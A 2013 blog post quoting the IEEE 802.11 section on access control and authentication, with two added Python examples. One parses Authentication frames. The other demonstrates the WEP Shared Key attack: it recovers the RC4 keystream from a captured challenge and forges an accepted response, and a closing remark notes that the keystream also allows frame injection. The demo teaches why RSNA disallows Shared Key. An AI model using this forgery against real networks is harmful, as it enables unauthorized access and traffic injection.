Friday, 8 February 2013

Access control and data confidentiality services


4.5.4 Access control and data confidentiality services
4.5.4.1 General

Two services are required for IEEE Std 802.11 to provide functionality equivalent to that which is inherent
to wired LANs. The design of wired LANs assumes the physical attributes of wire. In particular, wired LAN
design assumes the physically closed and controlled nature of wired media. The physically open medium
nature of an IEEE 802.11 LAN violates those assumptions.
In a WLAN that does not support RSNA, two services, authentication and data confidentiality, are defined.
IEEE 802.11 authentication is used instead of the wired media physical connection. WEP encryption was
defined to provide the data confidentiality aspects of closed wired media.
An RSNA uses the IEEE 802.1X authentication service along with enhanced data cryptographic
encapsulation mechanisms, such as TKIP and CCMP, to provide access control. The IEEE 802.11 station
management entity (SME) provides key management via an exchange of IEEE 802.1X EAPOL-Key frames.
Data confidentiality and data integrity are provided by RSN key management together with the enhanced
data cryptographic encapsulation mechanisms.
4.5.4.2 Authentication
IEEE 802.11 authentication operates at the link level between IEEE 802.11 STAs. IEEE Std 802.11 does not
provide either end-to-end (message origin to message destination) or user-to-user authentication.
IEEE Std 802.11 attempts to control LAN access via the authentication service. IEEE 802.11 authentication
is a station service (SS). This service may be used by all STAs to establish their identity to STAs with which
they communicate, in both ESS and IBSS networks. If a mutually acceptable level of authentication has not
been established between two STAs, an association is not established.
IEEE Std 802.11 defines four 802.11 authentication methods: Open System authentication, Shared Key
authentication, FT authentication, and simultaneous authentication of equals (SAE). Open System
authentication admits any STA to the DS. Shared Key authentication relies on WEP to demonstrate
knowledge of a WEP encryption key. FT authentication relies on keys derived during the initial mobility
domain association to authenticate the stations as defined in Clause 12. SAE authentication uses finite field
cryptography to prove knowledge of a shared password. The IEEE 802.11 authentication mechanism also
allows definition of new authentication methods.
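The four methods above are signalled on the air by the Authentication Algorithm Number field of the Authentication frame body (two octets, little-endian), followed by the transaction sequence number and a status code, and then any elements (the Shared Key challenge text travels as element ID 16). The following is an added example, not text or code from the standard or from this blog: a small parser and builder for that frame body, plus the first-frame policy an RSNA-capable AP applies, which admits Open System, FT and SAE but answers a Shared Key request with status 13 (unsupported algorithm). The algorithm numbers (0, 1, 2, 3), status codes (0, 13, 14) and element ID 16 are the values defined in IEEE Std 802.11-2012; the function names and the sample frames are constructed for this example.

```python
import struct

# Authentication Algorithm Number values (IEEE 802.11-2012, Table 8-36).
AUTH_ALGORITHMS = {
    0: "Open System",
    1: "Shared Key",
    2: "Fast BSS Transition (FT)",
    3: "Simultaneous Authentication of Equals (SAE)",
    65535: "Vendor specific",
}
# Status Code values used below (Table 8-37).
STATUS_SUCCESS = 0
STATUS_UNSUPPORTED_AUTH_ALGORITHM = 13
STATUS_OUT_OF_SEQUENCE = 14
# Element ID of the Challenge Text element carried in Shared Key transactions 2 and 3.
ELEMENT_CHALLENGE_TEXT = 16
# 4.5.4.2: an RSN infrastructure BSS uses Open System or SAE; FT reuses keys from the
# initial mobility domain association; Shared Key is disallowed.
RSNA_PERMITTED_ALGORITHMS = {0, 2, 3}


def parse_elements(data: bytes) -> dict:
    """Split the variable part of the body into {element ID: payload} (ID, length, payload TLVs)."""
    elements = {}
    offset = 0
    while offset + 2 <= len(data):
        eid, length = data[offset], data[offset + 1]
        payload = data[offset + 2:offset + 2 + length]
        if len(payload) != length:
            raise ValueError("truncated element %d" % eid)
        elements[eid] = payload
        offset += 2 + length
    if offset != len(data):
        raise ValueError("trailing octets after last element")
    return elements


def parse_auth_body(body: bytes) -> dict:
    """Decode the fixed fields of an Authentication frame body and its elements."""
    if len(body) < 6:
        raise ValueError("authentication frame body shorter than 6 octets")
    algorithm, seq, status = struct.unpack_from("<HHH", body, 0)
    return {
        "algorithm": algorithm,
        "algorithm_name": AUTH_ALGORITHMS.get(algorithm, "reserved"),
        "seq": seq,
        "status": status,
        "elements": parse_elements(body[6:]),
    }


def build_auth_body(algorithm: int, seq: int, status: int = STATUS_SUCCESS, elements=()) -> bytes:
    """Encode fixed fields plus (element ID, payload) pairs into a frame body."""
    body = struct.pack("<HHH", algorithm, seq, status)
    for eid, payload in elements:
        if len(payload) > 255:
            raise ValueError("element payload exceeds 255 octets")
        body += bytes((eid, len(payload))) + payload
    return body


def rsna_first_frame_status(request: bytes) -> int:
    """Status code an RSNA AP places in transaction 2 when answering a STA's first frame.

    Hypothetical policy helper for this example, not a complete authentication state machine:
    it only decides whether the requested algorithm may proceed.
    """
    req = parse_auth_body(request)
    if req["seq"] != 1:
        return STATUS_OUT_OF_SEQUENCE
    if req["algorithm"] not in RSNA_PERMITTED_ALGORITHMS:
        return STATUS_UNSUPPORTED_AUTH_ALGORITHM
    # Open System is admitted outright; FT and SAE continue with their own element exchange.
    return STATUS_SUCCESS


if __name__ == "__main__":
    # Constructed sample: a legacy AP's Shared Key transaction 2 carrying a 128-octet challenge.
    legacy_challenge = build_auth_body(1, 2, STATUS_SUCCESS, [(ELEMENT_CHALLENGE_TEXT, bytes(128))])
    print(parse_auth_body(legacy_challenge)["algorithm_name"])
    for alg in (0, 1, 2, 3):
        print(AUTH_ALGORITHMS[alg], "->", rsna_first_frame_status(build_auth_body(alg, 1)))
```

The same parser serves a capture-analysis task: any Authentication frame whose algorithm field decodes to 1 on a network that advertises an RSN element is either a misconfigured client or a downgrade attempt, since an RSNA never completes over Shared Key.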
An RSNA might support SAE authentication. An RSNA also supports authentication based on IEEE Std
802.1X-2004, or preshared keys (PSKs) after Open System authentication. IEEE 802.1X authentication
utilizes the EAP to authenticate STAs and the AS with one another. This standard does not specify an EAP
method that is mandatory to implement. See 11.5.5 for a description of the IEEE 802.1X authentication and
PSK usage within an IEEE 802.11 IBSS.
In an RSNA, IEEE 802.1X Supplicants and Authenticators exchange protocol information via the IEEE
802.1X Uncontrolled Port. The IEEE 802.1X Controlled Port is blocked from passing general data traffic
between two STAs until an IEEE 802.1X authentication procedure completes successfully over the IEEE
802.1X Uncontrolled Port.

SAE authentication or Open System 802.11 authentication is used in an RSN for infrastructure BSS. SAE
authentication, Open System 802.11 authentication, or no 802.11 authentication is used in an RSN for IBSS.
SAE authentication is used in an MBSS. An RSNA disallows the use of Shared Key 802.11 authentication.
A STA may be authenticated with many other STAs at any given instant.
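The exclusion of Shared Key authentication from an RSNA is worth seeing in code. In the four-frame Shared Key exchange the AP sends a 128-octet challenge in the clear (transaction 2) and the STA returns it WEP-encrypted (transaction 3); anyone who captures both frames XORs the known plaintext with the ciphertext and obtains the RC4 keystream for that IV, which is enough to answer any later challenge under the same IV without knowing the key. The following is an added example, not code from the standard or from this blog: a minimal RC4/WEP implementation, the AP-side check, and an attacker that recovers the keystream and forges a valid response. The key, IV and challenges are constructed with a seeded generator, and the WEP framing is simplified (3-octet IV directly followed by ciphertext, no Key ID octet or MAC header).

```python
import binascii
import random

CHALLENGE_LEN = 128  # Challenge Text element payload length in Shared Key authentication


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4: key-scheduling then pseudo-random generation of `length` octets."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return binascii.crc32(data).to_bytes(4, "little")


def wep_encrypt(wep_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP encapsulation: RC4 seeded with IV||key over plaintext||ICV (simplified framing)."""
    body = plaintext + wep_icv(plaintext)
    return iv + xor(body, rc4_keystream(iv + wep_key, len(body)))


def wep_decrypt(wep_key: bytes, frame: bytes):
    """Return the plaintext if the ICV verifies, else None."""
    iv, ciphertext = frame[:3], frame[3:]
    body = xor(ciphertext, rc4_keystream(iv + wep_key, len(ciphertext)))
    plaintext, icv = body[:-4], body[-4:]
    return plaintext if icv == wep_icv(plaintext) else None


def ap_accepts_response(wep_key: bytes, challenge: bytes, response_frame: bytes) -> bool:
    """AP-side check of Shared Key transaction 3: decrypted text must equal the challenge."""
    return wep_decrypt(wep_key, response_frame) == challenge


def recover_keystream(challenge: bytes, response_frame: bytes):
    """Attacker: known plaintext (challenge||ICV) XOR ciphertext gives the keystream for this IV."""
    iv, ciphertext = response_frame[:3], response_frame[3:]
    return iv, xor(challenge + wep_icv(challenge), ciphertext)


def forge_response(iv: bytes, keystream: bytes, new_challenge: bytes) -> bytes:
    """Attacker: answer a fresh challenge with the recovered keystream, never touching the key."""
    body = new_challenge + wep_icv(new_challenge)
    if len(keystream) < len(body):
        raise ValueError("recovered keystream too short for this challenge")
    return iv + xor(body, keystream[:len(body)])


def demo() -> dict:
    """Run the exchange once and report whether the forged response passes the AP's check."""
    rng = random.Random(2013)  # constructed, deterministic sample values
    wep_key = bytes(rng.randrange(256) for _ in range(13))  # 104-bit key, known to AP and legitimate STA only
    iv = bytes([0x0C, 0x0A, 0xFE])
    challenge1 = bytes(rng.randrange(256) for _ in range(CHALLENGE_LEN))
    # Legitimate STA answers transaction 2; the attacker passively captures both frames.
    legit_response = wep_encrypt(wep_key, iv, challenge1)
    legit_ok = ap_accepts_response(wep_key, challenge1, legit_response)
    iv_seen, keystream = recover_keystream(challenge1, legit_response)
    # Later the attacker authenticates itself against a new challenge under the same IV.
    challenge2 = bytes(rng.randrange(256) for _ in range(CHALLENGE_LEN))
    forged = forge_response(iv_seen, keystream, challenge2)
    return {
        "legit_accepted": legit_ok,
        "forged_accepted": ap_accepts_response(wep_key, challenge2, forged),
        "keystream_correct": keystream == rc4_keystream(iv + wep_key, CHALLENGE_LEN + 4),
    }


if __name__ == "__main__":
    print(demo())
```

The recovered keystream is also 132 octets of usable PRGA for injecting short WEP data frames under that IV, which is why a passive observer of one Shared Key exchange gains more than the ability to authenticate. Open System authentication followed by 802.1X or PSK key management leaks nothing comparable, which is the design the RSNA text above mandates.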
Because the IEEE 802.1X authentication process could be time-consuming (depending on the authentication
protocol in use), the authentication service can be invoked independently of the association service.
This type of preauthentication is typically done by a STA while it is already associated with an AP (with
which it previously authenticated). IEEE Std 802.11 does not require that STAs preauthenticate with APs.
However, authentication is required before an association establishment is complete.
If the authentication is left until reassociation time, this might impact the speed with which a STA
reassociates between APs, limiting BSS-transition mobility performance. The use of preauthentication takes
the authentication service overhead out of the time-critical reassociation process.
SAE authentication is performed prior to association and a STA can take advantage of the fact that it can be
IEEE 802.11 authenticated to many APs simultaneously by completing the SAE protocol with any number
of APs while still being associated to another AP. RSNA security can be established after association using
the resulting shared key.
